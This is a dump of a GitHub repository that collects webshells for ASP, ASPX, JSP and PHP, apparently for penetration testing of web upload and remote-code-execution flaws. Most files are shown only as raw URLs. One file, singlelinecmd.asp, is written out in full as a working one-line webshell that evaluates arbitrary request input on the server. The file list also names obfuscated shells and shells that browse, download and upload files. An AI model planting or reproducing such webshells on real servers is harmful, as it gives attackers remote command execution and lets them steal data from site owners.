├── README.md └── webshells ├── ASP ├── simplecmd.asp └── singlelinecmd.asp ├── ASPX ├── Pwd-protected-WEBSHELL_with_Exec-Browse-Download.aspx ├── cmd-webservice.asmx ├── cmd.aspx ├── filebrowser.aspx ├── fileupload.aspx └── simplecmd.aspx ├── JSP ├── Pwd-protected-WEBSHELL_with_browse_download_modules.jsp ├── base64cmd.jspx ├── simplecmd.jsp └── singlelinecmd.jsp └── PHP ├── obfuscatedcmd1.php ├── obfuscatedcmd2.php ├── simplecmd1.php ├── simplecmd2.php └── wwwolf-webshell.php /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/README.md -------------------------------------------------------------------------------- /webshells/ASP/simplecmd.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASP/simplecmd.asp -------------------------------------------------------------------------------- /webshells/ASP/singlelinecmd.asp: -------------------------------------------------------------------------------- 1 | <%eval request(0)%> 2 | -------------------------------------------------------------------------------- /webshells/ASPX/Pwd-protected-WEBSHELL_with_Exec-Browse-Download.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASPX/Pwd-protected-WEBSHELL_with_Exec-Browse-Download.aspx -------------------------------------------------------------------------------- /webshells/ASPX/cmd-webservice.asmx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASPX/cmd-webservice.asmx -------------------------------------------------------------------------------- /webshells/ASPX/cmd.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASPX/cmd.aspx -------------------------------------------------------------------------------- /webshells/ASPX/filebrowser.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASPX/filebrowser.aspx -------------------------------------------------------------------------------- /webshells/ASPX/fileupload.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASPX/fileupload.aspx -------------------------------------------------------------------------------- /webshells/ASPX/simplecmd.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/ASPX/simplecmd.aspx -------------------------------------------------------------------------------- /webshells/JSP/Pwd-protected-WEBSHELL_with_browse_download_modules.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/JSP/Pwd-protected-WEBSHELL_with_browse_download_modules.jsp -------------------------------------------------------------------------------- /webshells/JSP/base64cmd.jspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/JSP/base64cmd.jspx -------------------------------------------------------------------------------- /webshells/JSP/simplecmd.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/JSP/simplecmd.jsp -------------------------------------------------------------------------------- /webshells/JSP/singlelinecmd.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/JSP/singlelinecmd.jsp -------------------------------------------------------------------------------- /webshells/PHP/obfuscatedcmd1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/PHP/obfuscatedcmd1.php -------------------------------------------------------------------------------- /webshells/PHP/obfuscatedcmd2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/PHP/obfuscatedcmd2.php -------------------------------------------------------------------------------- /webshells/PHP/simplecmd1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/PHP/simplecmd1.php -------------------------------------------------------------------------------- /webshells/PHP/simplecmd2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/PHP/simplecmd2.php -------------------------------------------------------------------------------- /webshells/PHP/wwwolf-webshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JFR-C/Webshell-Upload-and-Web-RCE-Techniques/HEAD/webshells/PHP/wwwolf-webshell.php --------------------------------------------------------------------------------